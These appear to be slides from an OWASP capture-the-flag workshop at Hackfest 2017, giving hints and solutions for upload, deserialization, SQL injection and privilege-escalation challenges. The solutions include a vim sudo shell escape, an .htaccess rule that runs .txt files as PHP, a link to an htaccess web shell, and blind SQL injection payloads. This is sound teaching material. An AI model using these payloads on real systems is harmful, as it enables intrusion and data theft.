Mini-CTF OWASP
What is it ?
- What is the Mini-CTF ?
- Short entry level challenge.
- Designed to make people learn about vulnerabilities.
- Small competition at the Hackfest.
- 4 of them will be presented today.
- File upload.
- Deserialization.
- Advance SQL injection.
- Privilege escalation.
Where ?
- URL
- https://owasp.zhack.ca
- Privilege Escalation 2 / Privilege Escalation 1
- Upload 2
- SQL Injection 2
- PHP Serialization 1
- I usually keep the website up for 2-3 months after the CTF.
- https://owasp.zhack.ca
- GitHub
- https://github.com/HoLyVieR/Hackfest-MiniCTF-2017
Hints
- Privilege Escalation 2 / Privilege Escalation 1
- To launch
- sudo -u admin COMMAND
- To launch
- Upload 2
- PHP file are blocked by a .htaccess rule
- You can upload more than one file in the same directory
- Look for extensions or special file not blocked
- SQL Injection 2
- Try to look at what you can do with sub-select
- PHP Serialization 1.
- The "__destruct" method of an object will be automatically called. Try to find a way to chain this to reach the method that read or write file.
Solutions
- Privilege Escalation 2 / Privilege Escalation 1
- :e flag.txt
- (ESC) !/bin/bash
Solutions
- Upload 2
- .htaccess + fichier txt
- AddType application/x-httpd-php .txt
- .htaccess shell
- https://github.com/wireghoul/htshells/blob/master/shell/mod_php.shell.htaccess
- .htaccess + fichier txt
Solutions
- SQL Injection 2
- True condition
- aaaa"OR(SELECT(flag)FROM(flag))LIKE"F
- aaaa"OR(SELECT(flag)FROM(flag))LIKE"FL
- False condition
- aaaa"OR(SELECT(flag)FROM(flag))LIKE"G
- aaaa"OR(SELECT(flag)FROM(flag))LIKE"FK
- Tab instead of parenthesis can also be used
- True condition
Solutions
- Deserialization
- En démo !
Mini-CTF OWASP
By Olivier Arteau
Mini-CTF OWASP
- 1,811